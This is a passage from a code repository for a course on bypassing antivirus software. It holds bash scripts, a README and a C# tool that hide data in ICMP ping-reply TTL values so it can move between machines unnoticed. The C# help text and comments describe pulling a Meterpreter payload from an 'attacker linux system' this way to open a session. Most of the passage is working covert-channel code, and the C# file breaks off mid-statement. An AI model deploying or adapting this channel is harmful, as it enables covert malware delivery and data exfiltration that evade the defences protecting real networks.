for TTLs in `echo $Finalttlpayload | xxd -p -c 3`
do
string=`echo $TTLs | xxd -r -p`
if [ "$string" != $'' ] && [ "$string" != $'.' ];
then
echo "sudo sysctl net.ipv4.ip_default_ttl="$string "; sleep 2";
sudo sysctl net.ipv4.ip_default_ttl=$string; sleep 2;
fi
done
# Finish flags; the C# receiver needs ten consecutive 255 replies, this script's listen
# mode needs its 255 counter to reach 15.
sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2;
sudo sysctl net.ipv4.ip_default_ttl=100; sleep 2;
sudo sysctl net.ipv4.ip_default_ttl=255; sleep 2;
fi
if [ "$1" == $'listen' ] ;
then
while (true)
do
Time=`date '+%d/%m/%Y %H:%M:%S'`
((PingRequest++));

# TTL of the reply: depends on "ttl=NNN" being the 6th field of the ping reply line.
string=`ping $2 -c 1 | grep -e ttl= | awk {'print $6'}`
echo
string=`echo $string | cut -d'=' -f2`

case $string in
100)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 0"
# temp is the TTL of the previous reply; a repeated value is counted once (the sender
# puts a 253 between real repeats). NOTE(review): temp is empty before the first reply,
# so the very first arithmetic test is malformed; normally the 254 start flag arrives
# first and fills temp - confirm. Same pattern in every case below.
if (( $temp != 100 )) ;
then
payload+="0"
fi
;;
101)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 1"
if (( $temp != 101 )) ;
then
payload+="1"
fi
;;
102)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 2"
if (( $temp != 102 )) ;
then
payload+="2"
fi
;;
103)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 3"
if (( $temp != 103 )) ;
then
payload+="3"
fi
;;
104)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 4"
if (( $temp != 104 )) ;
then
payload+="4"
fi
;;
105)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 5"
if (( $temp != 105 )) ;
then
payload+="5"
fi
;;
106)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 6"
if (( $temp != 106 )) ;
then
payload+="6"
fi
;;
107)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 7"
if (( $temp != 107 )) ;
then
payload+="7"
fi
;;
108)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 8"
if (( $temp != 108 )) ;
then
payload+="8"
fi
;;
109)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 9"
if (( $temp != 109 )) ;
then
payload+="9"
fi
;;
110)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : a"
if (( $temp != 110 )) ;
then
payload+="a"
fi
;;
111)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : b"
if (( $temp != 111 )) ;
then
payload+="b"
fi
;;
112)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : c"
if (( $temp != 112 )) ;
then
payload+="c"
fi
;;
113)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : d"
if (( $temp != 113 )) ;
then
payload+="d"
fi
;;
114)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : e"
if (( $temp != 114 )) ;
then
payload+="e"
fi
;;
115)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : f"
if (( $temp != 115 )) ;
then
payload+="f"
fi
;;
255)
tput setaf 1;
echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' "

# Finish flag: leave the loop once c reaches 15.
((c++));

if (( $c == 15 )) ;
then
break
fi
;;
253)
tput setaf 3;
# Separator the sender inserts between two equal digits; nothing is appended,
# but temp changes so the next equal digit passes the != test.
echo "[$Time] ," $c ":Dumped Double Flag 'ttl 253' "
;;
esac

temp=$string;

tput setaf 9;
echo "Ping Requests:" $PingRequest
echo "your Payload :" $payload
tput setaf 9;

#final=`echo $payload | xxd -r -p`

# Decode the hex digits collected so far: od re-hexes the hex text, the first xxd -r
# undoes that, the second turns the hex digits into the original bytes (effectively the
# same as the commented-out one-step form).
final=`echo -n $payload | od -A n -t x1 | xxd -r -p | xxd -r -p`
echo "your Data : " $final

sleep 1;
done
fi

--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/README.md:
--------------------------------------------------------------------------------
# Course : Bypassing Anti Viruses by C#.NET Programming

Part 2 (Infil/Exfiltration/Transferring Techniques by C#) , Chapter 10 : Transferring Payload via ICMPv4 Traffic by TTL

eBook : Bypassing Anti Viruses by C#.NET Programming

eBook chapter 10 , PDF Download : https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/tree/master/CH10

# NativePayload_ICMP.sh help :

# Using this Method via two Linux systems (Linux only)

step1 (Linux system A with IPv4 192.168.1.10) : ./NativePayload_ICMP.sh shtext ”your text”

step2 (Linux system B with IPv4 192.168.1.13) : ./NativePayload_ICMP.sh listen 192.168.1.10

# Using this Method via one Linux system and one Windows system .
step1 (Linux system A with IPv4 192.168.1.10) : ./NativePayload_ICMP.sh shtext ”your text”

step2 (windows system B with IPv4 192.168.1.13) : ./NativePayload_ICMP.exe listen 192.168.1.10

Description: with Step1 (system A) you will inject bytes for "text" to TTL Values , with Step2 on (system B) you can have this text via Send/Rec ICMPv4 Traffic (Ping Response)


Using this Method via two Linux systems (Linux only)
![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/Chapter%2010%20-%20Transferring%20Payload%20via%20ICMPv4%20Traffic%20by%20TTL/NativePayload_ICMP.png)

Using this Method via one Linux system and one Windows system .
![](https://github.com/DamonMohammadbagher/NativePayload_ICMP/blob/master/Chapter%2010%20-%20Transferring%20Payload%20via%20ICMPv4%20Traffic%20by%20TTL/NativePayload_ICMP(WindowsLinux).png)

--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/NativePayload_ICMP(old version).sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Earlier, receive-only version of NativePayload_ICMP.sh: pings $1 once per second and
# rebuilds the text from the TTL of each reply (100..115 = one hex digit); the loop ends
# once the 255 finish-flag counter reaches 25. Only the listen role exists here.
# NOTE(review): despite the #!/bin/sh line the script relies on bash features
# (+=, (( ))); run it with bash.
payload="";
PingRequest=0;
c=0;
temp="";
while (true)
do
Time=`date '+%d/%m/%Y %H:%M:%S'`
((PingRequest++));

# TTL of the reply: depends on "ttl=NNN" being the 6th field of the ping reply line.
string=`ping $1 -c 1 | grep -e ttl= | awk {'print $6'}`
echo
string=`echo $string | cut -d'=' -f2`

case $string in
100)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 0"
# temp is the TTL of the previous reply; a repeated value is counted once.
# NOTE(review): temp is empty before the first reply, so the very first arithmetic
# test is malformed - confirm. Same pattern in every case below.
if (( $temp != 100 )) ;
then
payload+="0"
fi
;;
101)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 1"
if (( $temp != 101 )) ;
then
payload+="1"
fi
;;
102)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 2"
if (( $temp != 102 )) ;
then
payload+="2"
fi
;;
103)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 3"
if (( $temp != 103 )) ;
then
payload+="3"
fi
;;
104)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 4"
if (( $temp != 104 )) ;
then
payload+="4"
fi
;;
105)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 5"
if (( $temp != 105 )) ;
then
payload+="5"
fi
;;
106)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 6"
if (( $temp != 106 )) ;
then
payload+="6"
fi
;;
107)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 7"
if (( $temp != 107 )) ;
then
payload+="7"
fi
;;
108)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 8"
if (( $temp != 108 )) ;
then
payload+="8"
fi
;;
109)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : 9"
if (( $temp != 109 )) ;
then
payload+="9"
fi
;;
110)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : a"
if (( $temp != 110 )) ;
then
payload+="a"
fi
;;
111)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : b"
if (( $temp != 111 )) ;
then
payload+="b"
fi
;;
112)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : c"
if (( $temp != 112 )) ;
then
payload+="c"
fi
;;
113)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : d"
if (( $temp != 113 )) ;
then
payload+="d"
fi
;;
114)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : e"
if (( $temp != 114 )) ;
then
payload+="e"
fi
;;
115)
tput setaf 2;
echo "[$Time]" "Dumped Byte via TTL : f"
if (( $temp != 115 )) ;
then
payload+="f"
fi
;;
255)
tput setaf 1;
echo "[$Time] ," $c ":Dumped Finish Flag 'ttl 255' "

# Finish flag: leave the loop once c reaches 25.
((c++));

if (( $c == 25 )) ;
then
break
fi
;;
esac

temp=$string;

tput setaf 9;
echo "Ping Requests:" $PingRequest
echo "your Payload :" $payload
tput setaf 9;
# Decode the hex digits collected so far into bytes.
final=`echo $payload | xxd -r -p`
echo "your Data : " $final
sleep 1;
done

--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/README.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/finish.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/finish.png
--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 0.png
--------------------------------------------------------------------------------
/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 1.png
-------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 2.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/old_version/step 3.png -------------------------------------------------------------------------------- /Chapter 10 - Transferring Payload via ICMPv4 Traffic by TTL/script(for test).sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | sudo sysctl net.ipv4.ip_default_ttl=254; 4 | sleep 5; 5 | TtlPayload="106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100107109106115107105102114102100106109107104102107255107103102100106101106112106112102100106109106114107103106109106104106105102100106115106255106102100106113106105102100102114102114102114102100107109106115107105102100107255107106109106112106112102100107103106105106105"; 6 | for pay in `echo $TtlPayload | xxd -p -c 3` 7 | do 8 | str=`echo $pay | xxd -r -p` 9 | if [ "$str" != $'' ]; 10 | then 11 | echo "sudo sysctl net.ipv4.ip_default_ttl="$str "; sleep 2;" 12 | sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2; 13 | fi 14 | done 15 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 16 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 17 | sudo 
sysctl net.ipv4.ip_default_ttl=255; sleep 3; 18 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 19 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 20 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 21 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 22 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 23 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 24 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 25 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 26 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 27 | sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3; 28 | sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3; 29 | sudo sysctl net.ipv4.ip_default_ttl=255; 30 | echo "Done."; 31 | 32 | -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP(WindowsLinux).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_ICMP/65ee5fa58a1b2ea37e2020f866889569bcc57578/EBOOK/NativePayload_ICMP(WindowsLinux).png -------------------------------------------------------------------------------- /EBOOK/NativePayload_ICMP.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Diagnostics; 6 | using System.Data; 7 | using System.Runtime.InteropServices; 8 | 9 | namespace NativePayload_ICMP 10 | { 11 | class Program 12 | { 13 | static string payload = ""; 14 | public static DataTable Hex_Dec_Table; 15 | static string help = "\n" + "NativePayload_ICMP syntax :" + "\n\n" 16 | + "Syntax 1-1 : NativePayload_ICMP sh \"ffccab1cd01f0400 ....\" Input your meterpreter payload for create sh file" + "\n" 17 | + "Syntax 1-2 : NativePayload_ICMP session \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... 
Getting Meterpreter Session with Ping via TTL Values" + "\n" 18 | + "Syntax 2-1 : NativePayload_ICMP shtext \"your unicode text....\" Input your DATA/TEXT payload for create sh Script file" + "\n" 19 | + "Syntax 2-2 : NativePayload_ICMP listen \"www.xxx.yyy.zzz\" Target system IPv4 Address for Send Ping Request .... Dumping DATA/TEXT payload via TTL Values" + "\n" 20 | + "Syntax 3 : NativePayload_ICMP help" + "\n\n"; 21 | 22 | static void Main(string[] args) 23 | { 24 | try 25 | { 26 | Hex_Dec_Table = new DataTable(); 27 | 28 | Hex_Dec_Table.Columns.Add("Dec", typeof(int)); 29 | Hex_Dec_Table.Columns.Add("Hex", typeof(string)); 30 | 31 | for (int i = 0; i <= 15; i++) 32 | { 33 | if (i <= 9) 34 | { 35 | Hex_Dec_Table.Rows.Add(i, i.ToString()); 36 | } 37 | else if (i >= 10) 38 | { 39 | switch (i) 40 | { 41 | case 10: 42 | { 43 | Hex_Dec_Table.Rows.Add(i, "a"); 44 | } 45 | break; 46 | case 11: 47 | { 48 | Hex_Dec_Table.Rows.Add(i, "b"); 49 | } 50 | break; 51 | case 12: 52 | { 53 | Hex_Dec_Table.Rows.Add(i, "c"); 54 | } 55 | break; 56 | case 13: 57 | { 58 | Hex_Dec_Table.Rows.Add(i, "d"); 59 | } 60 | break; 61 | case 14: 62 | { 63 | Hex_Dec_Table.Rows.Add(i, "e"); 64 | } 65 | break; 66 | case 15: 67 | { 68 | Hex_Dec_Table.Rows.Add(i, "f"); 69 | } 70 | break; 71 | // default: 72 | } 73 | } 74 | } 75 | if (args[0].ToUpper() == "HELP") 76 | { 77 | Console.WriteLine(); 78 | Console.ForegroundColor = ConsoleColor.DarkGray; 79 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 80 | Console.ForegroundColor = ConsoleColor.Gray; 81 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 82 | Console.WriteLine(); 83 | Console.WriteLine(help); 84 | } 85 | else if (args[0].ToUpper() == "SH" || args[0].ToUpper() == "SHTEXT") 86 | { 87 | Console.WriteLine(); 88 | Console.ForegroundColor = ConsoleColor.DarkGray; 89 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 90 
| Console.ForegroundColor = ConsoleColor.Gray; 91 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 92 | Console.WriteLine(); 93 | if (args.Length == 2) 94 | { 95 | if (args[0].ToUpper() == "SH") 96 | { 97 | payload = args[1]; 98 | } 99 | if(args[0].ToUpper() == "SHTEXT") 100 | { 101 | try 102 | { 103 | byte[] Xbytes = ASCIIEncoding.ASCII.GetBytes(args[1]); 104 | foreach (var item in Xbytes) 105 | { 106 | payload += item.ToString("x2"); 107 | } 108 | } 109 | catch (Exception e) 110 | { 111 | Console.Write(e.Message); 112 | } 113 | } 114 | } 115 | string ff = ""; 116 | string lastone = ""; 117 | string TempPayload = ""; 118 | for (int i = 0; i < payload.Length;) 119 | { 120 | if (i != payload.Length) 121 | { 122 | ff = payload.Substring(i, 1); 123 | string ss = _HextoDecimal(ff); 124 | // debug only 125 | //Console.WriteLine(ff + " " + ss); 126 | ///Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 1 ;"); 127 | if (lastone != ss) 128 | { 129 | lastone = ss; 130 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 131 | TempPayload += ss.Substring(0, ss.Length - 1); 132 | } 133 | else 134 | { 135 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 136 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + ss + " ; " + "sleep 2 ; \n"); 137 | TempPayload += "255" + ss.Substring(0, ss.Length - 1); 138 | } 139 | //Console.Write("\n sudo sysctl net.ipv4.ip_default_ttl=" + "255" + " ; " + "sleep 1 ; \n"); 140 | //Console.WriteLine(); 141 | i++; 142 | } 143 | } 144 | 145 | StringBuilder Mycode = new StringBuilder(); 146 | Mycode.AppendLine(" #!/bin/sh \n"); 147 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=254;\r"); 148 | Mycode.AppendLine("sleep 5;"); 149 | Mycode.AppendLine("TtlPayload=\"" + TempPayload + "\";"); 150 | Mycode.AppendLine(" for pay in `echo $TtlPayload | xxd -p -c 3`"); 151 | Mycode.AppendLine(" do "); 
152 | Mycode.AppendLine(" str=`echo $pay | xxd -r -p`"); 153 | Mycode.AppendLine(" if [ \"$str\" != $'' ];"); 154 | Mycode.AppendLine(" then "); 155 | Mycode.AppendLine(" echo \"sudo sysctl net.ipv4.ip_default_ttl=\"$str \"; sleep 2;\""); 156 | Mycode.AppendLine(" sudo sysctl net.ipv4.ip_default_ttl=$str; sleep 2;"); 157 | Mycode.AppendLine(" fi"); 158 | Mycode.AppendLine(" done"); 159 | if (args[0].ToUpper() == "SHTEXT") 160 | { 161 | for (int i = 0; i < 5 - args[1].Length % 5; i++) 162 | { 163 | if (args[1].Length % 5 == 0) break; 164 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 165 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 166 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 167 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 168 | } 169 | 170 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255; sleep 3;"); 171 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=100; sleep 3;"); 172 | } 173 | 174 | Mycode.AppendLine("sudo sysctl net.ipv4.ip_default_ttl=255;"); 175 | Mycode.AppendLine("echo \"Done.\";"); 176 | 177 | Console.WriteLine("\n[!] 
File script.sh Created : \n"); 178 | Console.WriteLine(Mycode.ToString()); 179 | try 180 | { 181 | using (System.IO.FileStream Fs = new System.IO.FileStream("script.sh", System.IO.FileMode.Create, System.IO.FileAccess.Write, System.IO.FileShare.None)) 182 | { 183 | using (System.IO.StreamWriter sw = new System.IO.StreamWriter(Fs)) 184 | { 185 | sw.WriteLine(Mycode.ToString().Replace("\r", string.Empty)); 186 | } 187 | } 188 | } 189 | catch (Exception omg) 190 | { 191 | Console.WriteLine(omg.Message); 192 | } 193 | } 194 | else if (args[0].ToUpper() == "LISTEN") 195 | { 196 | bool flag_end = false; 197 | bool init = false; 198 | int flag_end_count = 0; 199 | int Payload_counter = 0; 200 | string temp = ""; 201 | string start_time, end_time = ""; 202 | start_time = DateTime.Now.ToString(); 203 | string Oonaggi = ""; 204 | Console.WriteLine(); 205 | Console.ForegroundColor = ConsoleColor.DarkGray; 206 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 207 | Console.ForegroundColor = ConsoleColor.Gray; 208 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 209 | Console.WriteLine(); 210 | Console.ForegroundColor = ConsoleColor.Yellow; 211 | Console.WriteLine("[!] 
Listening Mode"); 212 | Console.ForegroundColor = ConsoleColor.Gray; 213 | Console.WriteLine(); 214 | bool isDublicate = false; 215 | string Last_ttl_str = ""; 216 | string TestStr = ""; 217 | int Timer_Time_Show_Bytes = 0; 218 | int two = 0; 219 | string String_two_Bytes = ""; 220 | byte[] String_from_Bytes = new byte[5]; 221 | Console.WriteLine("{0} Dumping These Bytes: ", DateTime.Now.ToString()); 222 | String_two_Bytes = ""; 223 | while (true) 224 | { 225 | if (flag_end) break; 226 | //// ping and send ICMP Traffic to attacker linux system to Dump payloads via TTL response ;) 227 | string getcode = _Ping(args[1], 1); 228 | try 229 | { 230 | getcode = getcode.Remove(getcode.Length - 1, 1); 231 | } 232 | catch (Exception e1) 233 | { 234 | Console.ForegroundColor = ConsoleColor.Red; 235 | Console.WriteLine("e1 : " + e1.Message); 236 | Console.WriteLine(); 237 | Console.WriteLine("Error : it is not good ;( "); 238 | Console.WriteLine("Please run this tool again"); 239 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 240 | Console.ForegroundColor = ConsoleColor.Gray; 241 | break; 242 | } 243 | 244 | if (getcode == "254") { init = true; } 245 | if (getcode == "255") 246 | { 247 | isDublicate = true; 248 | Last_ttl_str = getcode; 249 | } 250 | if (getcode != "255") 251 | { 252 | Last_ttl_str = getcode; 253 | flag_end_count = 0; 254 | 255 | if (getcode != temp && getcode != "255" && getcode != "253") 256 | { 257 | if (init && getcode != "254") 258 | { 259 | if (Timer_Time_Show_Bytes == 10) 260 | { 261 | Console.ForegroundColor = ConsoleColor.DarkCyan; 262 | int kk = 0; 263 | for (int i = 0; i < 5;) 264 | { 265 | String_from_Bytes[i] = byte.Parse(String_two_Bytes.Substring(kk, 2), System.Globalization.NumberStyles.HexNumber); 266 | kk++; 267 | kk++; 268 | i++; 269 | } 270 | 271 | Console.Write(" ==> " + ASCIIEncoding.ASCII.GetString(String_from_Bytes)); 272 | Timer_Time_Show_Bytes = 0; 273 | String_two_Bytes = ""; 274 | 
Console.WriteLine(); 275 | } 276 | 277 | Console.ForegroundColor = ConsoleColor.Cyan; 278 | TestStr = getcode.Substring(getcode.Length - 2, 2); 279 | string Text = ""; 280 | for (int j = 0; j <= 15; j++) 281 | { 282 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(TestStr)) 283 | { 284 | 285 | Text = (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 286 | break; 287 | } 288 | } 289 | 290 | Console.Write("{0}", Text); 291 | String_two_Bytes += Text; 292 | 293 | Payload_counter++; 294 | Timer_Time_Show_Bytes++; 295 | two++; 296 | } 297 | else if (init == false) 298 | { 299 | // Console.ForegroundColor = ConsoleColor.DarkGreen; 300 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 301 | } 302 | } 303 | else if (getcode == temp && getcode != "255") 304 | { 305 | // Console.ForegroundColor = ConsoleColor.DarkGreen; 306 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 307 | } 308 | 309 | System.Threading.Thread.Sleep(1000); 310 | temp = getcode; 311 | } 312 | else if (getcode == "255") 313 | { 314 | flag_end_count++; 315 | Console.ForegroundColor = ConsoleColor.Gray; 316 | // Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 317 | 318 | System.Threading.Thread.Sleep(500); 319 | temp = getcode; 320 | if (flag_end_count >= 10) 321 | { 322 | flag_end = true; 323 | Console.ForegroundColor = ConsoleColor.Gray; 324 | Console.WriteLine(); 325 | Console.WriteLine("{0} Dumping Payloads Done.",DateTime.Now.ToString()); 326 | } 327 | } 328 | } 329 | } 330 | else if (args[0].ToUpper() == "SESSION") 331 | { 332 | bool flag_end = false; 333 | bool init = false; 334 | int flag_end_count = 0; 335 | int Payload_counter = 0; 336 | string temp = ""; 337 | string start_time, end_time = ""; 338 | start_time = 
DateTime.Now.ToString(); 339 | string Oonaggi = ""; 340 | Console.WriteLine(); 341 | Console.ForegroundColor = ConsoleColor.DarkGray; 342 | Console.WriteLine("NativePaylaod_ICMPv4 v2.0 , Published by Damon Mohammadbagher , 2017-2018"); 343 | Console.ForegroundColor = ConsoleColor.Gray; 344 | Console.WriteLine("Using ICMPv4 (ping) to Dump Payloads by TTL response ;)"); 345 | Console.WriteLine(); 346 | Console.ForegroundColor = ConsoleColor.Yellow; 347 | Console.WriteLine("[!] Meterpreter Session Mode"); 348 | Console.ForegroundColor = ConsoleColor.Gray; 349 | Console.WriteLine(); 350 | bool isDublicate = false; 351 | string Last_ttl_str = ""; 352 | while (true) 353 | { 354 | if (flag_end) break; 355 | //// ping and sending ICMP Traffic to attacker linux system to Dump payloads by TTL response ;) 356 | string getcode = _Ping(args[1], 1); 357 | try 358 | { 359 | getcode = getcode.Remove(getcode.Length - 1, 1); 360 | } 361 | catch (Exception e1) 362 | { 363 | Console.ForegroundColor = ConsoleColor.Red; 364 | Console.WriteLine("e1 : " + e1.Message); 365 | Console.WriteLine(); 366 | Console.WriteLine("Error : it is not good ;( "); 367 | Console.WriteLine("Please run this tool again"); 368 | Console.WriteLine("after running this tool Please again run your ./script.sh in linux ;)"); 369 | Console.ForegroundColor = ConsoleColor.Gray; 370 | break; 371 | } 372 | 373 | if (getcode == "254") { init = true; } 374 | if (getcode == "255") 375 | { 376 | isDublicate = true; 377 | Last_ttl_str = getcode; 378 | } 379 | if (getcode != "255") 380 | { 381 | Last_ttl_str = getcode; 382 | flag_end_count = 0; 383 | if (getcode != temp && getcode != "255" && getcode != "253") 384 | { 385 | if (init && getcode != "254") 386 | { 387 | Console.ForegroundColor = ConsoleColor.Green; 388 | Console.Write("{0} , Dump:{1},", DateTime.Now.ToString(), Payload_counter.ToString()); 389 | Console.ForegroundColor = ConsoleColor.Cyan; 390 | //string dd = _HextoDecimal(getcode.Substring(1, 2)); 391 | 
Console.Write(" DATA[{0}] ", getcode.Substring(getcode.Length - 2, 2)); 392 | Oonaggi += getcode.Substring(getcode.Length - 2, 2); 393 | Console.ForegroundColor = ConsoleColor.Green; 394 | Console.WriteLine("from {0} final: {1}", args[1], getcode); 395 | Payload_counter++; 396 | } 397 | else if (init == false) 398 | { 399 | Console.ForegroundColor = ConsoleColor.DarkGreen; 400 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 401 | } 402 | } 403 | else if (getcode == temp && getcode != "255") 404 | { 405 | Console.ForegroundColor = ConsoleColor.DarkGreen; 406 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 407 | } 408 | 409 | System.Threading.Thread.Sleep(1000); 410 | temp = getcode; 411 | } 412 | else if (getcode == "255") 413 | { 414 | flag_end_count++; 415 | Console.ForegroundColor = ConsoleColor.DarkGreen; 416 | Console.WriteLine("{0} , {1} Find DATA from {2} final: {3}", DateTime.Now.ToString(), Payload_counter.ToString(), args[1], getcode); 417 | 418 | System.Threading.Thread.Sleep(500); 419 | temp = getcode; 420 | if (flag_end_count >= 10) { flag_end = true; } 421 | } 422 | } 423 | 424 | end_time = DateTime.Now.ToString(); 425 | 426 | Console.WriteLine(end_time + " , Done "); 427 | 428 | byte[] __Bytes = new byte[Oonaggi.Length / 4]; 429 | int payload_dec_count = Oonaggi.Length / 4; 430 | int tmp_counter = 0; 431 | string current = null; 432 | int _0_to_2_ = 0; 433 | for (int d = 0; d < payload_dec_count;) 434 | { 435 | string tmp1_current = (Oonaggi.Substring(tmp_counter, 2)); 436 | 437 | for (int j = 0; j <= 15; j++) 438 | { 439 | if (Convert.ToInt32(Hex_Dec_Table.Rows[j].ItemArray[0]) == Convert.ToInt32(tmp1_current)) 440 | { 441 | _0_to_2_++; 442 | 443 | current += (Hex_Dec_Table.Rows[j].ItemArray[1].ToString()); 444 | 445 | if (_0_to_2_ == 2) 446 | { 447 | Console.Write(current + " 
